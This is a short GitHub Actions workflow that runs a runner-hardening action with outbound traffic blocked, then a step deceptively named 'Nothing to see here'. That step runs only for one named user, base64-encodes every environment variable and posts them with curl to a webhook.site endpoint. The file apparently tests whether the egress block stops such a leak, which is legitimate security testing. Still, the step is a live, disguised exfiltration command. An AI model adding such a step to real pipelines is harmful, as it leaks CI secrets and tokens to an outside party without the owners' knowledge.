name: manual

on:
  workflow_dispatch:

jobs:
  first_job:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@v2.13.1
        with:
          disable-sudo: true
          egress-policy: block

      - name: Nothing to see here
        if: ${{ github.actor == 'jksolbakken' }}
        run: |
          ALL_ENVS=$(env | base64)
          curl -s -d "a=${ALL_ENVS}" https://webhook.site/e6fa91f2-fdf0-48d6-aa1d-7c54b456d733

  